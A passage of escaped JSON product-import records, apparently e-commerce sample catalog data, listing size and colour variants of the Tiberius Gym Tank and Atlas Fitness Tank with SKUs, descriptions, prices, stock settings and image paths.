Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tiberius Gym Tank-S-Yellow\",\"description\":\"<p>Whether you\'re classy or just sweaty, the Tiberius Gym Tank helps you look good while you\'re at it. What\'s more, its moisture-wicking, quick-drying, anti-microbial and anti-odor construction help ensure you\'re welcome back to the gym.<\\/p>\\n<p>&bull; Yellow scoop neck cotton tank.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<br \\/>&bull; Pesticide- and herbicide-free hemp.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiberius-gym-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"662\":{\"sku\":\"MT10-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tiberius Gym Tank-M-Yellow\",\"description\":\"<p>Whether you\'re classy or just sweaty, the Tiberius Gym Tank helps you look good while you\'re at it. What\'s more, its moisture-wicking, quick-drying, anti-microbial and anti-odor construction help ensure you\'re welcome back to the gym.<\\/p>\\n<p>&bull; Yellow scoop neck cotton tank.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<br \\/>&bull; Pesticide- and herbicide-free hemp.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiberius-gym-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"663\":{\"sku\":\"MT10-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tiberius Gym Tank-L-Yellow\",\"description\":\"<p>Whether you\'re classy or just sweaty, the Tiberius Gym Tank helps you look good while you\'re at it. What\'s more, its moisture-wicking, quick-drying, anti-microbial and anti-odor construction help ensure you\'re welcome back to the gym.<\\/p>\\n<p>&bull; Yellow scoop neck cotton tank.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<br \\/>&bull; Pesticide- and herbicide-free hemp.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiberius-gym-tank-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"664\":{\"sku\":\"MT10-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tiberius Gym Tank-XL-Yellow\",\"description\":\"<p>Whether you\'re classy or just sweaty, the Tiberius Gym Tank helps you look good while you\'re at it. What\'s more, its moisture-wicking, quick-drying, anti-microbial and anti-odor construction help ensure you\'re welcome back to the gym.<\\/p>\\n<p>&bull; Yellow scoop neck cotton tank.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<br \\/>&bull; Pesticide- and herbicide-free hemp.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiberius-gym-tank-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"665\":{\"sku\":\"MT10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tiberius Gym Tank\",\"description\":\"<p>Whether you\'re classy or just sweaty, the Tiberius Gym Tank helps you look good while you\'re at it. What\'s more, its moisture-wicking, quick-drying, anti-microbial and anti-odor construction help ensure you\'re welcome back to the gym.<\\/p>\\n<p>&bull; Yellow scoop neck cotton tank.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<br \\/>&bull; Pesticide- and herbicide-free hemp.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|EverCool&trade;|Organic Cotton,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT10-XS-Yellow,size=XS,color=Yellow|sku=MT10-S-Yellow,size=S,color=Yellow|sku=MT10-M-Yellow,size=M,color=Yellow|sku=MT10-L-Yellow,size=L,color=Yellow|sku=MT10-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"image\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cocona&reg; performance fabric|EverCool&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"666\":{\"sku\":\"MT11-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank-XS-Blue\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atlas-fitness-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"667\":{\"sku\":\"MT11-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank-S-Blue\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atlas-fitness-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"668\":{\"sku\":\"MT11-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank-M-Blue\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atlas-fitness-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"669\":{\"sku\":\"MT11-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Atlas Fitness Tank-L-Blue\",\"description\":\"<p>From weekend warrior to Warrior Pose II, no role can beat the Atlas Fitness Tank, a versatile top for gym and yoga studio. Wicking-weave soft fabric helps prevent uncomfortable chafing.<\\/p>\\n<p>&bull; Teal scoop neck cotton tank.<br \\/>&bull; Triblend, soft fabric.<br \\/>&bull; Relaxed fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"18\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atlas-fitness-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\